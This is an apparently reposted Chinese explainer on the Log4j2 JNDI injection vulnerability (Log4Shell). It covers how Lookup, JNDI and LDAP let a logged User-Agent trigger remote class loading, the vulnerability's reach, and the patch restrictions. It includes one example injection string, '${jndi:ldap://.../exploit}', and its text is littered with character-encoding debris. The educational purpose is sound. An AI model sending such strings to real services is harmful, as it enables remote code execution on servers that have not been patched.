|
相信大家這兩天應(yīng)該被這么一條新聞刷屏了吧: 這個(gè)漏洞到底是怎么回事��? 核彈級�,真的有那么厲害嗎? 怎么利用這個(gè)漏洞呢��? 我看了很多技術(shù)分析文章����,都太過專業(yè),很多非Java技術(shù)?;蛘卟桓惆踩娜酥荒芸磦€(gè)一知半解,導(dǎo)致大家只能看個(gè)熱鬧���,對這個(gè)漏洞的成因��、原理���、利用方式�、影響面理解的不到位。 這篇文章����,我嘗試讓所有技術(shù)相關(guān)的朋友都能看懂:這個(gè)注定會(huì)載入網(wǎng)絡(luò)安全史冊上的漏洞,到底是怎么一回事! log4j2不管是什么編程語言�����,不管是前端后端還是客戶端�,對打日志都不會(huì)陌生。 通過日志�,可以幫助我們了解程序的運(yùn)行情況,排查程序運(yùn)行中出現(xiàn)的問題���。 在Java技術(shù)棧中���,用的比較多的日志輸出框架主要是log4j2和logback。 今天討論的主角就是log4j2����。 我們經(jīng)常會(huì)在日志中輸出一些變量,比如: logger.info('client ip: {}', clientIp)
現(xiàn)在思考一個(gè)問題: 假如現(xiàn)在想要通過日志輸出一個(gè)Java對象�,但這個(gè)對象不在程序中,而是在其他地方�����,比如可能在某個(gè)文件中�����,甚至可能在網(wǎng)絡(luò)上的某個(gè)地方,這種時(shí)候怎么辦呢���? log4j2的強(qiáng)大之處在于��,除了可以輸出程序中的變量����,它還提供了一個(gè)叫Lookup的東西��,可以用來輸出更多內(nèi)容: lookup�,顧名思義就是查找、搜索的意思����,那在log4j2中,就是允許在輸出日志的時(shí)候�,通過某種方式去查找要輸出的內(nèi)容。 lookup相當(dāng)于是一個(gè)接口��,具體去哪里查找����,怎么查找,就需要編寫具體的模塊去實(shí)現(xiàn)了���,類似于面向?qū)ο缶幊讨卸鄳B(tài)那意思�。 好在�,log4j2已經(jīng)幫我們把常見的查找途徑都進(jìn)行實(shí)現(xiàn)了: 具體每一個(gè)字的意思,這里就不詳述了����,這不是本文的重點(diǎn)。 JNDI主要來看其中那個(gè)叫JNDI的東西: JNDI即Java Naming and Directory Interface(JAVA命名和目錄接口)�,它提供一個(gè)目錄系統(tǒng),并將服務(wù)名稱與對象關(guān)聯(lián)起來���,從而使得開發(fā)人員在開發(fā)過程中可以使用名稱來訪問對象�。
看不懂���?看不懂就對了���! 簡單粗暴理解:有一個(gè)類似于字典的數(shù)據(jù)源,你可以通過JNDI接口�,傳一個(gè)name進(jìn)去,就能獲取到對象了���。 那不同的數(shù)據(jù)源肯定有不同的查找方式�����,所以JNDI也只是一個(gè)上層封裝����,在它下面也支持很多種具體的數(shù)據(jù)源。 LDAP繼續(xù)把目光聚焦���,咱們只看這個(gè)叫LDAP的東西����。 LDAP即Lightweight Directory Access Protocol(輕量級目錄訪問協(xié)議)���,目錄是一個(gè)為查詢����、瀏覽和搜索而優(yōu)化的專業(yè)分布式數(shù)據(jù)庫�,它呈樹狀結(jié)構(gòu)組織數(shù)據(jù),就好象Linux/Unix系統(tǒng)中的文件目錄一樣����。目錄數(shù)據(jù)庫和關(guān)系數(shù)據(jù)庫不同����,它有優(yōu)異的讀寫性能�,但寫性能差����,并且沒有事務(wù)處理、回滾等復(fù)雜功能�����,不適于存儲(chǔ)修改頻繁的數(shù)據(jù)����。所以目錄天生是用來查詢的,就好像它的名字一樣����。
看不懂?看不懂就對了�����! 這個(gè)東西用在統(tǒng)一身份認(rèn)證領(lǐng)域比較多,但今天也不是這篇文章的重點(diǎn)����。你只需要簡單粗暴理解:有一個(gè)類似于字典的數(shù)據(jù)源,你可以通過LDAP協(xié)議�,傳一個(gè)name進(jìn)去,就能獲取到數(shù)據(jù)���。 漏洞原理好了���,有了以上的基礎(chǔ),再來理解這個(gè)漏洞就很容易了���。 假如某一個(gè)Java程序中���,將瀏覽器的類型記錄到了日志中: String userAgent = request.getHeader('User-Agent');logger.info(userAgent);網(wǎng)絡(luò)安全中有一個(gè)準(zhǔn)則:不要信任用戶輸入的任何信息。 這其中��,User-Agent就屬于外界輸入的信息�����,而不是自己程序里定義出來的�。只要是外界輸入的,就有可能存在惡意的內(nèi)容。 假如有人發(fā)來了一個(gè)HTTP請求��,他的User-Agent是這樣一個(gè)字符串: ${jndi:ldap://127.0.0.1/exploit}
接下來���,log4j2將會(huì)對這行要輸出的字符串進(jìn)行解析���。 首先����,它發(fā)現(xiàn)了字符串中有 ${},知道這個(gè)里面包裹的內(nèi)容是要單獨(dú)處理的�。 進(jìn)一步解析,發(fā)現(xiàn)是JNDI擴(kuò)展內(nèi)容����。 再進(jìn)一步解析,發(fā)現(xiàn)了是LDAP協(xié)議�,LDAP服務(wù)器在127.0.0.1,要查找的key是exploit���。 最后����,調(diào)用具體負(fù)責(zé)LDAP的模塊去請求對應(yīng)的數(shù)據(jù)。 如果只是請求普通的數(shù)據(jù)�,那也沒什么,但問題就出在還可以請求Java對象����! Java對象一般只存在于內(nèi)存中,但也可以通過序列化的方式將其存儲(chǔ)到文件中�,或者通過網(wǎng)絡(luò)傳輸。 如果是自己定義的序列化方式也還好�,但更危險(xiǎn)的在于:JNDI還支持一個(gè)叫命名引用(Naming References)的方式,可以通過遠(yuǎn)程下載一個(gè)class文件��,然后下載后加載起來構(gòu)建對象��。 PS:有時(shí)候Java對象比較大�,直接通過LDAP這些存儲(chǔ)不方便,就整了個(gè)類似于二次跳轉(zhuǎn)的意思��,不直接返回對象內(nèi)容�����,而是告訴你對象在哪個(gè)class里���,讓你去那里找�����。
注意��,這里就是核心問題了:JNDI可以遠(yuǎn)程下載class文件來構(gòu)建對象?����。����?!。 危險(xiǎn)在哪里��? 如果遠(yuǎn)程下載的URL指向的是一個(gè)黑客的服務(wù)器���,并且下載的class文件里面藏有惡意代碼��,那不就完?duì)僮恿藛幔?/p> 還沒看懂��?沒關(guān)系�����,我畫了一張圖: 這就是鼎鼎大名的JNDI注入攻擊����! 其實(shí)除了LDAP,還有RMI的方式�,有興趣的可以了解下。 JNDI 注入其實(shí)這種攻擊手法不是這一次出現(xiàn)了�,早在2016的blackhat大會(huì)上,就有大佬披露了這種攻擊方式����。 回過頭來看,問題的核心在于: Java允許通過JNDI遠(yuǎn)程去下載一個(gè)class文件來加載對象����,如果這個(gè)遠(yuǎn)程地址是自己的服務(wù)器,那還好說��,如果是可以被外界來指定的地址�,那就要出大問題! 前面的例子中�����,一直用的127.0.0.1來代替LDAP服務(wù)器地址�����,那如果輸入的User-Agent字符串中不是這個(gè)地址,而是一個(gè)惡意服務(wù)器地址呢��? 影響規(guī)模這一次漏洞的影響面之所以如此之大���,主要還是log4j2的使用面實(shí)在是太廣了�����。 一方面現(xiàn)在Java技術(shù)棧在Web�、后端開發(fā)����、大數(shù)據(jù)等領(lǐng)域應(yīng)用非常廣泛,國內(nèi)除了阿里巴巴���、京東、美團(tuán)等一大片以Java為主要技術(shù)棧的公司外�����,還有多如牛毛的中小企業(yè)選擇Java���。 另一方面���,還有好多像kafka�����、elasticsearch��、flink這樣的大量中間件都是用Java語言開發(fā)的�����。 在上面這些開發(fā)過程中��,大量使用了log4j2作為日志輸出����。只要一個(gè)不留神��,輸出的日志有外部輸入混進(jìn)來�,那直接就是遠(yuǎn)程代碼執(zhí)行RCE,滅頂之災(zāi)����! 修復(fù)新版的log4j2已經(jīng)修復(fù)了這個(gè)問題��,大家趕緊升級��。 下面是log4j2官網(wǎng)中關(guān)于JNDI lookup的說明: 我通過搜索引擎找到了緩存的12月10號前的快照���,大家對比一下,比起下面這個(gè)緩存�����,上面那一版多了哪些東西�����? 答案是:修復(fù)后的log4j2在JNDI lookup中增加了很多的限制: 默認(rèn)不再支持二次跳轉(zhuǎn)(也就是命名引用)的方式獲取對象 只有在log4j2.allowedLdapClasses列表中指定的class才能獲取����。 只有遠(yuǎn)程地址是本地地址或者在log4j2.allowedLdapHosts列表中指定的地址才能獲取
以上幾道限制,算是徹底封鎖了通過打印日志去遠(yuǎn)程加載class的這條路了��。 最后�����,手機(jī)前的各位Java小伙伴兒們��,你們寫的程序中有用到log4j2嗎��,有沒有某個(gè)地方的輸出��,有外部的參數(shù)混進(jìn)來呢����? 趕緊檢查檢查哦! 大家弄懂這個(gè)漏洞了嗎��? 如果覺得寫得還不錯(cuò)�,歡迎分享轉(zhuǎn)發(fā),點(diǎn)個(gè)贊��,感謝大家的閱讀���。 原文鏈接:
https://mp.weixin.qq.com/s/4MnOQGg7LBYCUE7BuuGfEQ
|
